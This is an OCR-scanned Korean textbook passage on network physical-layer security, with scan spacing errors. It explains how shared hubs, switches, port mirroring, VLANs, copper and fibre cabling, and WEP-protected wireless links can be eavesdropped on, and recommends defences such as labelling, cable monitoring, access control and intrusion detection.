사무환경의 돌발적인 손상과 봉사인원이나 건설자들로 하여 케블이 절단되는 일이 
일어 날수 있다는것을 명 심하여 야 한다. 긴급대 책과 수복대 책계 획을 가지지 못하면 
자기의 지위를 위험에 빠뜨리게 된다. 

케블손상 

케블의 손상은 정상적인 마모로부터 생길수 있다. 케블련결동작이 지나치게 오래면 
케블플라그와 자크우의 접속두가 파손될수 있다. 케블은 과도한 구부림 이 나 당기기로 인 
해서도 저절로 손상될수 있다. 이것은 망에서 때때로 통신중단을 일으킬수 있으며 믿을 
수 없는 통신에로 이끌어 갈수 있다. 케블파손은 적절한 설치기술을 통하여서와 기술설 
명서에 알맞는 조작을 효과적 으로 하기 위하여 로출된 케 블에 대한 정기적 인 검사를 수 
행함으로써 감소시킬수 있다. 

도청 

도청 은 전기 신호를 도청하려 는 케 블결 에 어 떤 장치 를 놓고 도청한후 그것 을 외 부전 
송매체우에서 류사한 신호로 다시 변환할 때 일어 난다. 이것은 도청을 알아 차리고 있 
기 때 문에 본래 의 수신기 와 송신기없 이 정 보를 알아 볼 능력 을 가진 허 가되 지 않은 사용 
자가 제 공한다. 이것은 이써네트가 직 렬케블을 가지 고는 더 쉽 게 실현할수 있으나 빛섬 
유케 블을 가지 고는 훨 씬 더 어 려운데 왜 냐하면 빛섬 유케 블을 로출시 켜 야 하기 때 문이 다. 
빛섬 유케 블의 바깥피 복이 손상되 면 그의 특성 이 변경 되 여 현저한 신호손실 이 빚 어 지 게 
된 다. 

물리적공격 

대 부분의 망장치 들은 물리 적측면 에 서 공격 을 받기 쉽다. 그것 은 그 어 떤 진지한 망 
설 계 자가 케 블함，케 블도관 기 타 물리 적보호장치 를 리용하여 장치 들의 물리 적 보안을 취 
하는데 적당한 관심을 돌리게 될것 이기때문이 다. 물리적접근을 하면 공격자가 거의 아무 
것이나 할수 있다는것은 알려 진것이다. 그렇지만 많은 경우 공격자는 충분한 시간을 가 
질수 없다. 만일 공격 자들이 자기 의 공격 과 접 근획 득을 개 시하는데 시 간이 필요하다면 
그들은 론리 적접 근이 나 망에 기 초한 접 근을 리용할것 이 다. 

론리적공격 

많은 망요소들은 망을 거 처 접 근할수 있다. 결과적 으로 이 모든 장치들은 비 법접근 
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을 거 절 할수 있게 정 확히 구성 되여 야 할것 이 다. 이 장치 들에 대 한 침 입 이 나 공격을 식별 
하기 위하여 추가적인 예방，검출 그리고 대응장치들을 설치해야 할것이며 기관안에 있 
는 해당 감시대리점들에 그것을 보호하게 하여야 한다. 


요 약 


오늘날 망작업환경에 대하여 정보보안전문가들이 알아야 할 문제들은 많다. 그 
렇다고 해서 망기술자들이 안전한 해결책을 설계하는데 도움이 되게끔 모든 성분 
혹은 물리적전송방법전체를 리해해야 한다는것은 아니다. 그렇지만 이것은 그들이 
무엇에 대하여 이야기하는가에 대한 지식과 망이 각이한 매체선택권을 가지고 구성 
되는 방법에서의 차이에 대한 지식，고유한 위험이 무엇인가에 대한 지식을 요구한 
다. 그렇지만 각이한 망매체와 위상구조들이 있음에도 불구하고 위험요소들이 있는 
한 그것들사이에는 상당한 정도의 공통성이 있다. 만일 설계(즉 망수준의 암호화)안 
에 망수준의 보호가 고려되지 않았다면 보안기반의 그 어디엔가 그것을 포함시키는 
것이 필요하다. 

망설계조와 보호전문가들은 자료의 보호와 무결성에 대한 관심이 망전반에 걸쳐 유 
지되는것을 담보하는데 밀접한 관계를 가져야 한다. 
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제 6 장. 유선 및 무선물리층보안의 문제점 

제임스 트룰라브 

망보안에 대한 문제는 보통 OSI -7 계층모형의 상위층에 관한 문제이다. 그렇지만 인 
터네트상에서 오가는 자료통보문내용의 정상적인 보호이외에도 망의 물리적보안과 관련 
한 중요한 문제 점들도 있다. 지 어 방화벽안쪽에 있는 기 업소망도 비 법접근에 대 하여서는 
취약점을 가지고 있을수 있다. 

기 성 유선망은 동선련결 이 든 빛섬 유련결 이 든 관계 없 이 여 러 가지 수단에 의 하여 도청 을 
당한다. 또한 침투적인 도청수법은 아니지만 결코 과소평가할수도 없는 망을 배회하는 방법 
들도 있다. 무선망형성이 추가적특성들을 가지게 됨으로 하여 물리적망보안은 약화되게 된다. 
새로운 기술들이 출현하기때문에 물리적보안의 약화로 하여 회사정보가 손실될수 있는 가능 
성들을 구체적으로 따져 보아야 하며 위험성을 약화시킬수 있는 조치들도 강구하여야 한다. 

침 입 탐지 와 직 접 배 선식 감시 와 갈은 자동화된 보안조치 들외 에 도 망관리 절 차를 세 밀 히 
조직한다면 물리 적보안을 개 선할수 있 다. 망설 계 를 정 확히 하는것 은 응당한 수준의 보안 
을 달성하는데 서 매 우 중요하다. 유선망에 서 리용되 는 조치 들외 에 도 암호화를 리용하여 
무선망들을 철 저 히 보호하여 야 할것 이 다. 


유선망우 I 상구조의 기초 


국부망을 구성해 본 사람이 면 누구든지 망배선과 케블결선에 대 한 기초적 인 리해는 
다 가지 고 있다. 현대 적 인 LAN 은 거 의 례 외없이 이써네 트별형 망이 다. 개 별적 인 케 블들이 
중앙적인 능동집선기로부터 매 워크스테이션，망인쇄기，봉사기 혹은 경로기와 련결되여 
있다. 오늘날의 기술수준에서 이 능동집선기들은 교환기능， VLAN (가상 LAN ) 려과기능，단 
순3계층경로조정과 갈은 추가적인 기능들을 수행하기도 한다. 일부 경우에 이러한 장치들 
의 구성과 호상결선을 일정하게 달리하면 망의 물리적보안이 달라 질수도 있다. 

망요소들의 구성방식을 그림 6-1 에 보여 주었다. 그림 6-1 에서는 사용자 대 집선기 
그리 고 집 선기 대 집 선기간의 표준적 인 결선방식 과 교환집선기 가 망의 중심 에 놓여 있는 
결선방식을 보여 준다. 우에서 제시된 3개의 VLAN 들은 부서가 서로 다른 사용자들을 리론 
적으로 구획하여 준다. 하나의 VLAN 의 총적인 목적은 여러 그룹의 사용자들을 서로 갈라 
줌으로써 그 사용자들이 일정한 응용프로그람들에 접 근하지 못하게 하거 나 서 로의 자료들 
을 보지 못하게 하는것 이다. VLAN 들은 원래 도해로 표시하기 어려우며 따라서 물리층보안 
처 리문제에서 다소 복잡하다. 흔히 자립형경로기들은 VLAN 들사이의 자료경로를 서로 련결 
시켜 주며 방화벽을 통하여 인터네트를 비롯한 외부와 련결시켜 주는데 쓰인다. 이른바 3계 
층교환기 는 이 경 로기 의 비 WAN 적 기 능들을 실제 적 으로 수행할수 있지 만 일부 종류의 WAN 
경로기는 싸이트밖의 자료들을 인터네트와 갈은 외부에 련결시키는데도 필요할수 있다. 
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과 화파과 R A1SIC C C C C ^ 

사포자* 4 포자 t 

그림 6-1. 공유, 교환 및 경로조정된 련결을 가진 망의 위상구조 


이 장에서는 이러한 망의 매 구성요소들의 물리층보안문제와 각 요소들사이의 실제 
적 인 호상배 선에 서의 물리 적보안문제 들을 다룬다. 


공유 집 선기 


이씨네트망위상구조의 원래 개념은 공유된 동축매체를 일정한 간격으로 중도에서 따 
서 워크스테 이션들을 련결시키는것이 였다. 이 매체의 매 길 이를 토막이라고 하였으며 가 
능하면 그 토막에 반복기 나 망다리 를 련결 하여 다른 토막들을 련결 할수도 있 었다. 매 토 
막에 련결된 국들은 신호가 없는가를 알아 본 다음에야 송신을 시작하며 그 매체에서 충 
돌요소(두 국이 같은 시간에 송신하는것)가 없는가를 감시하였다. 이 하나의 토막(혹은 
중계 기들로 련결된 여 러 토막들의 묶음)은 충돌령역 으로 간주되는데 이 령 역 내 에서 그 
어느 곳에서 충돌이 일어 나도 그 전체 령역에 영 향을 미친다. 그러 나 실제적으로 기본 
동축선 혹은 그 어떤 련결송수신기，련결케블, 접속구나 망대면부기판 ( NIC ) 들에 그 어떤 
결 함이 있 어 도 그 전체 토막에 서는 교란이 일 어 난다. 

이 단일 한 결 함에 의한 고장의 효과를 극복하기 위한 한가지 방도는 중계 기 나 망다 
리 들의 수를 늘이는것 이 다. 공유집선기 를 설 치하면 물리적케블의 결함으로 생 기는 망고 
장을 줄일수 있다. 동축케 블을 쓰는 이씨네 트망에 서 는 이 공유집 선기 를 다중포구반복기 
라고 불렀는데 이것은 공유집선기의 기능들을 정확히 표현한것 갈다. 일반적으로 
10 Base - T 라고 부르는 꼬임 쌍선케 블 이써네 트가 새 로 출현함으로 하여 망결선보안이 더 
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강화되였다. 이러한 결선구조를 리용하면 결함이 있는 결선상태들을 알수 있으며 집선기 
에서 결함 있는 련결점들을 정확히 고립시킴으로써 충돌령역을 잘 보호할수 있다. 득 같 
은 형태의 공유망환경 들은 10 Base - F , 100 Base - T , 100 Base - FX , 100 Base-SX (고속이써네트)， 
1000 Base - T , 1000 Base - TX , 1000 Base - FX , 1000 Base-SX (기 가비 트이 써 네 트)에 서 도 가능하다. 

그러 나 공유집 선기 는 본질적 으로 볼 때 자료교환을 위한 전송매 체의 일부로 볼수 있 
다. 공유된 망에서 사적비밀에 대한 보장은 각국들의 호상협동에 의해서만 실현된다. 자 
료파케트들은 하나의 목적 및 원천 주소를 가지고 공유망에서 교환된다. 자료파케트들은 
보낼 곳과 원천주소를 가지 고 공유망에 서 송신되 는데 규약에 의하여 매 워 크스테 이 션마 
디점 들이 고유목적 지 주소를 가진 파케 트들만 《 기 다리》게 되 여 있 다. 반대 의 견지 에 서 
보면 하나의 워크스테이션은 자기에게로 보내진 전송량만 오기를 기다리며 자기에게 할 
당된 주소를 원천주소로 하여 공유망에 자료파케트들을 보낸다. 정확한지. 

실천에서는 망엿보기도구라고 부르는 정교한 망감시장치들을 그 어떤 공유망에 련결 
하며 매 개개의 전송파케트들을 보는것은 가능하다. 이 감시장치들은 매우 비싸고 
( US $ 10,000-25,000) 성 능이 전문화된 장치 로서 리 론적 으로는 망침입 을 제 한하게 끔 되 여 
있 다. 그러 나 성 능이 훨 씬 낮으며 덜 정 교한 파케 트람색 쏘프트웨어 들도 쉽 게 구입할수 
있으며 그것들 (PDA 를 포함한)은 임의의 워크스테이션우에서도 가동할수 있다. 이렇게 되 
면 물리적보안문제 가 상당히 복잡해 지는데 그것은 비 법적 이든 아니든 련결된 모든 망장 
치들이 공유 LAN 상의 모든 전송량들을 실지로 다 흉쳐 볼수 있기때문이다. 

강제식엿 보기도구들뿐아니 라 워크스테 이션도 비 법적으로 망자원들에 간단히 접근할 
수 있 다. 실 례 로 여 러 가지 망조작체 계 ( NOS ) 환경 에 서 는 합법 적 인 사용자에 게 만 허 용된 망 
자원들에 누구나 쉽게 접근할수 있다. Microsoft 회사의 보안결함들은 통과암호프로파일로 
부터 시작하여 NetBIOS 에 이르기까지 그리고 능동통제구조로부터 시작하여 문제성 있기 
로 유명한 전자우편 및 열 람기 에 이르기까지 문건들에 매우 잘 반영되 여 있다. 비 법적으 
로 정보채취를 하는 우연적인 침입자가 쓸수 있는 프로그람들은 수없이 많다. 

공유집선기환경 에서 물리층보안에 관심 을 돌려야 할것은 망자원에 접속된 워크스레 
이선들에 대한 물리적접근을 제한하는 문제이다. 대부분의 경우 이러한 워크스테이션에 
대 한 물리 보안통제 는 극상해 야 시 동통과암호，망접 속통과암호，화면 보호프로그람의 통과 
암호의 사용，콤퓨터설비를 물리적으로 안전하게 건사하는것 그리고 물리매체보안에 국 
한되여 있다. 대부분의 콤퓨터시동루린，망접속，화면보호프로그람 등을 쓰면 워크스테이 
션 을 사용하지 않을 때 접 근을 통제 하고 보호 할수 있다. 이 통과암호들은 개 별 화되 여 야 
하며 자주 바꾸어 야 한다. 

망에 워크스테이션들을 추가하며 집선기를 다른 망장치들에 련결하는 절차들은 문건 
으로 잘 만들어 놓아야 하며 그 실현작업 은 해 당 권한을 부여 받은 전문인원들에 의하여 
수행 되 여 야 한다. 추가，이 동，변경 등에 대 한 문건도 잘 구비해 놓아야 한다. 또한 물리 
적인 망결선과 배선에 대해서는 외부기관의 검열을 정기적으로 받음으로써 망의 무결성 
이 담보되 도록 하여 야 한다. 이 검 사외 에 도 워 크스테 이 션들을 자체 로 감시 통제하는 망도 
구들과 스크립 트들을 리용함으로써 모든 망결선장치 들이 공개 되 고 승인을 받으며 망침입 
에 쓰일수 있는 그 어 떤 쏘프트웨어 도 없도록 하여 야 한다. 
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교환집 선기는 물리적보안들 확장시킨다 


공유망의 기본적 인 보안상 결함은 망을 횡 단하는 모든 파케트들이 그 충돌령역 안에 
있는 모든 워크스테이션들에 가닿을수 있는 점이다. 사실상 충돌령역에는 수백개의 워크 
스테이션들이 있을수 있다. 교환집선기라고 하는 특별한 형태의 집선기를 리용하면 집선 
기 의 자료처 리 량을 몇 배 로 늘일뿐아니 라 보충적 인 보안조치 를 강구하는것 으로도 된다. 

교환집 선기 는 하나의 OSI 2계 층장치 로서 한 파케 트의 목적 지 매 체 접 근조종 ( MAC ) 주 
소를 조사하고 그 MAC 주소장치 가 있는 해 당 교환기포구토막에만 그 파케 트를 골라서 중 
계한다. 다른 말로 말하면 한 파케 트가 그 어 떤 포구로부터 들어 왔는데 포구 3에 있는 
알려 진 MAC 주소 지로 가게 되여 있다면 그 파케트는 직접 포구 3에 련결되여 보내지 
며 그 어떤 다른 나가는 포구에는 나타나지 않는다. 이 과정 을 그림 6_2에서 설명한다. 
교환기는 본질상 다중포구 2계층망다리로서 자기에게 련결된 모든 장치들의 MAC 주소의 
상대 적 인 위 치들을 판정하여 처 리된 매 파케트에 해 당한 목적포구에 로의 림시 경 로(목적 
MAC 주소에 기초하여)를 형성하여 준다. 이 처 리는 대체 로《 배선속도》로 진행된다. 포 
구들사이에 동시 결선경로도 조성될수 있는데 그렇게 되면 공유망한계이상으로 처리 률을 
효과적으로 높여 준다. 

교환집선기 들은 흔히 간단한 물리 적보안장치 로 사용되 는데 그것 은 교환집선기 들이 
포구들을 고립시 켜 파케 트전송에 참여하지 못하게 하기 때 문이 다. 전체 망이 교환식 결선 
이 되여 있는 경우에는 이런 식의 보안이 좋다. 그러나 교환집선기들은 아직도 공유집선 
기보다 더 비싸며 그림 6 — 1에서 보는바와 같이 망들은 대부분 교환기 대 공유집선기위 
상구조를 리 용하고 있 다. 이것 이 사용자집 단들사이 그리 고 일정한 망자원들사이 를 격 리 
시키는 하나의 조치로도 되지만 그렇게 되면 그 공유집선기에 련결된 한 사용자는 그 집 
선기에 련결된 다른 사용자에게 보내는 모든 파케트들을 볼수 있게 된다. 

교환집선기상에서의 합법적검사와 감시는 공유집선기에서보다 훨씬 더 어렵다. 례를 
들어 포구 7( 그림 6_2)에 련결된 엿보기도구는 포구 8에서 포구 3으로 보내오는 파케트 
를 볼수 없 다. 그 엿 보기 도구는 분명 자체 의 MAC 주소를 가져 야 교환기 가 그것 을 인식하 
고 이 두 마디 점 들사이 에 그 어 떤 파케 트도 통과하지 않게 될 것 이 다. 이 문제 를 일 정하게 
해결하기 위해서는 일부 집선기들에 포구거울화 (port mirroring ) 라고 하는 기능이 필요하다. 



그림 6-2. 이써네트교환집선기의 동작 
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포구거울화라는 기능을 쓰면 선정된 포구에 모든 전송자료를 복사하여 주는 공유형 
청취포구를 교환기상에 림시적으로 만들어 놓을수 있게 된다. 혹은 공유집선기를 포구 3 
이나 포구 8에 림시적으로 끼워 넣어 매 포구에 해당한 전송자료들을 볼수도 있다. 공유 
집선기가 있는 망의 일부분인 어느 한 포구에 실수로 거울화를 해놓는 경우 이것은 그 
망에 하나의 보안상 위험으로 될수 있다. 특히 거울화해 놓는 포구가 우연히도 봉사기나 
경 로기 결선에 리용되 는 경 우 특히 그 리용은 심 각한바 그것 은 이 장치 로는 수많은 사용 
자들로부터 오는 자료를 볼수 있기 때 문이 다. 교환식 망에서의 보안리 용을 극복하기 위해 
서는 포구거울화를 림시적인 고장퇴치기법으로만 리용하며 교환집선기의 운영을 정기적 
으로 감시하여 포구거울화가 되지 않도록 해놓는것이 좋다. 혼합형공유/교환식망에서 계 
층이 VLAN 들을 쓰면 일정하게 마음이 놓이 는 경 우도 있 다. 또한 같은 부서 에 서 전용적 
으로 쓰는 집선기들에 사용자들이 물리적으로 접근하지 않도륵 함으로써 다른 부서의 자 
료들을 그 누가 내탐하지 않도록 하는것도 중요하다. 이렇게 되는 경우는 매 부서준위의 
공유집선기들이 웃 준위의 교환식집선기에 련결되여 아마 VLAN 에 의한 격리가 보장되 
는 경우일것 이 다. 관리 자들은 통과암호관리를 엄격 히 실행하며 교환기관리대 면부에 대 한 
접 근도 철저 히 통제하여 야 한다. 망보안에 서 가장 우심한 위 반현상은 기 정값통과암호를 
수정하지 못하는것과 통제 통과암호를 정기적 으로, 체계적 으로 갱 신하지 못하는것 이 다. 

VLAN 은 허위보안들 제공한다 

망보안의 개 선을 위하여 가장 흔히 리용되 는 기 능의 하나는 가상 LAN 구성기 술이 다. 
VLAN 들은 계층 2나 계층 3에서 실현될수 있다. 

계층 2에 속하는 VLAN 에는 자료교환에 필요한 MAC 주소목록이 포함되여 있으므로 
관리하기가 상당히 힘들다. 다른 형태인 계층 1/계층 2에 속하는 VLAN 들은 다른 VLAN 
들에 교환기의 물리적 인 포구들을 배 당한다. 여기 에서 주의하여 야 할것은 교환기포구에 
련결 되 여 있는 모든 장치 들이 그 VLAN 에만 제 한되 여 있 다는것 이 다. 따라서 공유집 선기 
1( 그림 6 — 1을 참조)에 련결된 모든 사용자들은 교환집선기 포구 1의 VLAN 에만 속하게 
될것이다. 이것은 망설계에서 하나의 우점으로 되며 보안을 상당히 높일수 있다. 
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그림 6-3. VLAN A, B 및 C 교환집선기와 
공유이써네트집선기를 통한 작용 



여기에 계층 2에 대한 허위가 있다. 계층 2 VLAN 은 계층교환망이나 혼성공유/교환 
망의 다른 모든 사용자들로부터의 파케트들을 격리시키지 못한다. 혼성망에서 모든 
VLAN 들은 그림 6 — 3에서 보여 준것 처 럼 임의의 공유집선기우에 있을수 있다. 

따라서 공유집선기 2우에 있는 임의의 사용자는 VLAN 에는 관계없이 그 집선기우에 
있는 임의의 정 보흐름을 엿볼수 있다. 포구에 기초한 계층 2 VLAN 에서 관리 자는 VLAN 
의 매개 포구에 접속되여 있는 모든 사용자들이 해당 포구로부터 나오는 혹은 해당 포구 
로부터 나가는 임의의 자료를 볼수 있도록 하여야 한다. 그러나 그렇게 할수 있는 유일 
한 방도는 매 사용자를 그 자신의 교환기 포구에만 접 속시켜 주어 야 하는데 그렇 게 되 면 
VLAN 이 가지고 있는 편리성이 없어 지며 추가적인 설치의 복잡성이 생기게 된다. MAC 
에 기 초한 VLAN 은 여 전히 다른 사용차들로 하여 금 공유집 선기 나거 울화된 교환집선기 상 
에 서 파케 트들을 엿볼수 있 게 한다. 

계층 3 VLAN 은 실제 적 으로 높은 수준의 규약부분망이 다. MAC 주소외 에도 인터네트 
규약 ( IP ) 자료를 가지고 있는 파케트들은 원천주소와 목적주소를 가진다. 부분망이라고 하 
는 IP 주소들의 부분모임에는 많은 주소들이 련속적으로 담겨 져 있다. 표준적으로 IP 장치 
들은 기 준주소와 부분망마스크(부분망주소범 위 를 규정하는)들을 통하여 부분망들을 인식 
한다. IP 규약묶음은 갈은 부분망안의 주소가 아닌 자료교환을 가려 낸다. 계층 3에 해당 
하는 경로기는 부분망사이의 접속을 할수 있게 한다. 기술적으로 두개의 장치들은 갈은 
부분망내에서 서로《말을 주고받을수 있는〉〉 IP 주소를 가져야 하거나 그 두개의 부분망 
들을 인식하는 경 로기 를 통하여 련결되 여 야 한다. 

문제 는 바로 서 로 다른 부분망의 IP 자료파케 트들이 그 어떤 충돌령역 내 에서도 공 
존할수 있 다는것 즉 동일한 공유집 선기 나 교환기 련결 상에 서 존재할수 있 다는것 이 다. 
TCP/IP 규약은 자기장치에 해당하는 주소를 가지지 않는 파케트들은 그 어느것 이든 무 
시 해 버린 다. 

사실상 임의의 워크스테이션상의 엿보기 또는 훔쳐보기프로그람은 충돌령역안에 있 
는 모든 전송흐름에 대하여 IP 주소에 관계없이 다 볼수 있다. IP 전송이 아닌 경우에도 우 
의 사실이 그대로 성립된다. 비법적인 국이 전송흐름을 훔쳐 보지 못하도록 자원에 대한 
물리 적접 근제 한에 주의 를 돌리 지 않는다면 각이한 부분망들에 장치 들을 배 치하여 자료전 
송을 보호한다는것은 하나의 롱담에 불과하다. 

VLAN / 부분망에 교환기의 첨부 


VLAN 과 부분망을 가진 교환망에 서 전적 으로 교환기만 사용해 도 상당한 정 도의 보 
안대책이 세워 질수 있다. 사실상 이러한 방식은 많은 핵심망들에서 특정한 보호된 경로 
에 자료흐름과 자원 이 흘러 들어 가지 않도록 제 한하기 위하여 리 용하는 방식 이 다. 자료 
에 직접 접근할수 있는 경우 그 싸이트의 물리적보안에 위험성이 조성된다. 물리적인 접 
속이 해당 장치들에만 국한되고 포구거울화를 하지 못하게 설정되여 있고 그 어떤 원격 
람색(흔히 트로이목마라고 부론다.)프로그람들도 은밀히 가동하지 못하며 방화벽조치들이 
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확고히 서 있는 한 물리적계층에서 볼 때 망보호는 상당히 안전해 질것이다. 비법접근위 
험을 줄이는것은 물리적보안에 크게 달려 있다. 다음 부분에서 볼수 있는바와 같이 유선 
물리적보안은 매우 중요한 다른 하나의 문제로 된다. 

유선물리적보안 


유선물리적보안은 본질적으로 세 가지 측면을 가지고 있다. 즉 합법적 인 결선，우발적 
인 신호의 전파，유선물리적무결성이다. 첫번째 요구는 현존케블배선상태를 조사하고 모 
든 망이 정확히 배선되였는가를 확인하는것이다. 매국의 케블，련결코드，련결판，집선기 
등에 일관성 있게 계통적으로 표식을 해두는것은 모든 망배선상태에 대하여 누구나 다 
알게 하며 또 합법적인것으로 되게끔 하는데서 필수적인것이다. 

매 케블들이 어떻게 련결되였는가，해당 배선이 실지로 필요한가，콤퓨터들의 위치가 
변경되면 낡은 배선이 회수되는가. 를퓨터가 없는 위치에 망배선을 위한 예비꽂개를 가 
지 고 있는것보다 어리석은 일은 없다. EIAATIA -596 A 《원격통신경로 및 공간에 대 한 상 
업적건설물표준》과 EIA / TIA -606 《상업적건물의 원격통신기반에 대한 관리표준》은 망 
배 선 및 공간구성 에 대 한 배 치，규격，표식 달기 에 대 한 광범 위 한 안내 지 침 을 주고 있 다. 

그외 에 ANSFTIA / EIA -568 표의 《 상업 적 건물의 원격 통신케 블배 선 표준》이 권 고하는 
케 블성능측정 값들은 파일에 보관하여 정 기적 으로 그 측정 을 반복하여 야 한다. 리유는 단 
순하다. 자료흐름경 로의 배 선도중에 도청 장치 를 설 치하면 많은 경 우 케 블성 능이 그라프 
적으로 심하게 변화될것이다. 실례로 벽이나 천정에 숨겨 케블에 공유집선기를 끼우면 
자료를 도청할수 있게 된다. 그러 나 이 렇게 하면 케 블스캐 너 가 알려 주는 케블길 이 는 물 
론 다른 파라메터 들도 달라 지 게 된 다. 

망케블배선에는 두가지 형태 즉 4쌍의 동선으로 이루어 진 케블과 한쌍의 빛섬유로 
이 루어 진 케 블이 있 다. 둘다 은밀 히 감시 당할수 있 다. 동케 블배 선은 물리 적접 속이 필요 
하지 않기때문에 위험성이 더 크다. 잘 알려 진바와 같이 고속자료망배선에서는 2개 또 
는 그이상의 절연된 동선꼬임쌍선으로 전기적신호를 보낸다. 10 Base-T 이씨네트는 
10 MHz 의 기 본진동수를 가지 며 신호성 분은 그이 상이 다. 100 Base-T 고속이 써네 트에 서는 
부호화기 술을 리용하여 대 부분의 신호성 분주파수를 100 MHz 이 하로 유지한다. 둘다 전자 
기 마당을 산생하는데 그 전자기마당은 대체 로 선쌍을 이루는 두 도체사이 에 존재한다. 
그렇 지 만 실지 에 네 르기 의 일정한 량은 케 블을 둘러 싸고 있는 공간으로 복사된다. 

이 형태의 케 블배선과 관련하여 주의해 야 할 기 본문제 는 이 복사되 는 신호가 일 반라 
지오파수신에 장애가 되지 않도륵 작아야 한다는것이다. 그렇다고 하여 그 신호가 너무 
작아서 전달되지 못할 정도로까지 되여야 한다는것은 아니다. 사실 제3부류케블이 있는 
곳이 면 어 디서 든지 거 기서 나오는 전자기신호를 더 잡을수 있다. 제5부류와 그이상의 케 
블들은 등급상으로만 더 좋은 케블일따름이다. 달리 말하면 그 케블은 전자적인 측면에 
서 《김이 새는》호수처럼 배선 전 구간에서 약간한 량의 신호를 계속 흘러게 된다. 

케블의 경 로를 따라 임의의 곳에 수감기를 설치하면 자료신호를 잡을수 있다. 실지 
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로는(다행스러운 일이지만) 이보다 좀더 힘들기는 하다. 그것은 이렇게 하자면 기술이 매 
우 정교해 야 되며 접근，전력 그리고 적당한 수신점도 필요하기때문이다. 이밖에 쌍방향 
(완전2중)전송은 여 러겹케블이 그러 하듯이 두 방향으로 보내는 자료를 서 로 차페한다. 이 
것은 물리적인 직접접속에서보다는 보통자료망에 대하여 적은 위협을 줄것이지만 그렇다 
고 하여 그 위협을 무시하지 말아야 한다. 

빛섬 유케 블도청 은 실행 하기 가 훨씬 힘 든 문제 이 다. 동선배선에서와는 달리 빛섬 유로 
보내는 신호는 빛형 태 이고 유리섬유안에서 반송된다. 그렇지만 도청 이 라체빛섬유나 호 
상 접 속점 에 서 접 근을 하게 된 다면 신호에 뚫고 들어 가 도청할 방법 은 있 다. 빛 의 대 부 
분이 유리섬유를 따라서 세로방향으로 통과한다는것은 사실이다. 그렇지만 사람이 그것 
을 검출할 수단을 가지게 된다면 빛섬유의 측면벽을 통하여 극히 작은 신호량은 리용할 
수도 있다. 아마도 이 빛신호는 다자태빛섬 유에서 더 잘 루출될것 인바 거기서 는 빛 이 단 
일 자태빛섬 유에 서 와 같이 두께 가 매 우 가는 속심 에 국한되 지 않는다. 이 밖에 빛 섬 유주행 
경 로의 많은 호상접 속점가운데 서 어 느 하나에 접 근할수 있 다면 누구든지 선을 따서 자료 
를 감시할수 있 을것 이 다. 

빛섬유케블구간들에는 련결부 ( patch ) 와 수평빛섬유케블쌍이 있어 거기에 달린 접속구 
들은 이 음카드와 수평 도관의 매 끝점 들에 련결시킬수 있게 되 여 있다. 이 음접속구가 달 
린 케 블의 매 경간들은 피동결합기 ( adapter 라고도 부름)를 사이 에 두고 서 로 련결된다. 실 
례로 전형적인 빛섬유선들은 벽을 따라 워크스테 이션을 련결할수 있는 콘센트에로 들어 
온다. 이 케블의 두 빛섬유선들의 끝에는 SC 혹은 한개의 새로운 소형요소접속구와 갈은 
빛 섬 유단자가 불어 있 다. 벽결 선판에 있는 빛 섬 유접 수기 ( adapter ) 에 그 련결 단자들을 꽃은 
다음 그 결선판은 콘센트함에 붙인다. 사용자케블 즉 련결선 (patch cord ) 은 바로 그 빛섬 
유접수기의 바깥부분에 꽃아 설비 와 련결한다. 만약 어떤 사람이 결선판에서 설 비접속구 
들을 뽑아 그 빛섬유회선에 어떤 도청장치를 끼워 넣는데는 시간이 몇초밖에 걸리지 않 
을것이다. 그것은 결선판이 SC 접속구와 갈은 표준접속구들로 간편하게 구성되여 있기때 
문이 다. 

벽결선판에 쓰이는 빛섬유종단형태들이 일부 경우 호환성이 없음으로 하여 이러한 
위 험성들은 일정하게 감소되 였다. 그렇지 만 이것은 약간의 재 간만 가지 면 쉽 게 극복할수 
있 는것 이 다. 

직 접 선을 련결하거 나 망케 블에 따들어 가는 경우 흔히 케블결선이 림시적 으로 중단 
되여야 한다. 케블감시장치들을 쓰면 케블에서의 순간적인 결선중지상태를 람지할수 있 
으며 그런 장치 를 가지고서는 비 법집선기를 통해 케 블을 다시 련결하거 나 그 망에 새 로 
운 결선을 할수도 있게 된다. 이러한 전문케블감시장치들은 일어 나는 모든 사건들을 다 
보고하고 기록함으로써 관리자는 케블결선체 계상에 그 어떤 비정상적 인 상태가 조성되는 
경우 인차 알수 있게 되여 있다. 

보안사고는 현실적으로 일어 나며 따라서 그에 대해서는 미리 예상하는것이 좋다. 
방화벽뒤 에 침 입검 출체 계를 설 치하여 내부 및 외부의 보안상 문제점 들을 방지하여 야 한 
다. 그렇게 되 면 내부망에 대 한 비 법접근을 검 출하는 가장 효과적 인 도구로 될것 이 다. 침 
입검 출체 계 의 기 능에 는 규약의 상위층들에 대 한 감시 는 물론 물리층에 대 한 경 보체 계 와 
보고체계도 포함되 여 있어 야 한다. 
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무선물리층보안 


무선망장치들은 본질상 목적을 가지고 자기의 주변에 무선신호를 내보낸다. 물론 합 
법적인 장치들만 그 무선신호를 수신하게 되여 있지만 도청을 막는것은 불가능하다. 망 
주소화와 무선망《 이름달기》를 한다고 해도 그것 이 우연한 사용자가 무선망에 들어 오 
지 못하게 하는데서는 효과적일수 있지만 실제적인 도움은 크게 주지 못한다. 

무선자료송신을 쉽게 감시하지 못하게 하는 유일한 방도는 자료의 암호화이다. 현재 
판매중에 있 는 많은 무선 LAN 장치 들은 지 금 유선등가사적비 밀 보장 ( WEP : Wired-Equivalent 
Privacy ) 을 표준기 능으로 제 공하고 있 다. 이 기 능은 64비 트암호화표준으로서 수동열 쇠교 
환을 리 용하여 무선망대 면부기관 ( WNIC ) 과 접 근점 망다리 (Access point bridge ) (이 것 은 유선 
망에 접속한다.)사이의 신호를 개별화한다. 이것은 그 이름이 보여 주는것처럼 높은 수준 
의 보안으로는 되 지 못하며 LAN 케 블결선상에 서 와 같은 수준의 사적비 밀 보장을 제 공할 
따름이다. 

일 부 WNIC 들이 128비 트암호화와 같은 보다 긴 암호화알고리 듬을 리용하는것 은 추 
가적 인 보안조치의 하나로 될수 있을것 이다. 그렇지만 이 암호화체계에는 관리상 문제점 
이 하나 있어서 열쇠 들을 철저 히 보관하여 야 예견한 수준의 사적비밀보장의 무결성 이 담 
보될 수 있 다. 

흔히 쓰는 쎌방식 의 무선체 계 와 같은 무선 WAN 접 속에 는 다른 하나의 보안상 문제 
점 이 있다. 현재 효과적인 암호화기법을 쓰는 체계들은 얼마 없으므로 수신력과 복호화 
장치가 있으면 그 누구든지 이러한 망들에 쉽게 접속할수 있게 되여 있다. 따라서 이러 
한 망체 계 에서 비 밀통신을 진행하려 면 강력암호화수준의 SSL 을 반드시 리용하여 야 한다. 

결 론 


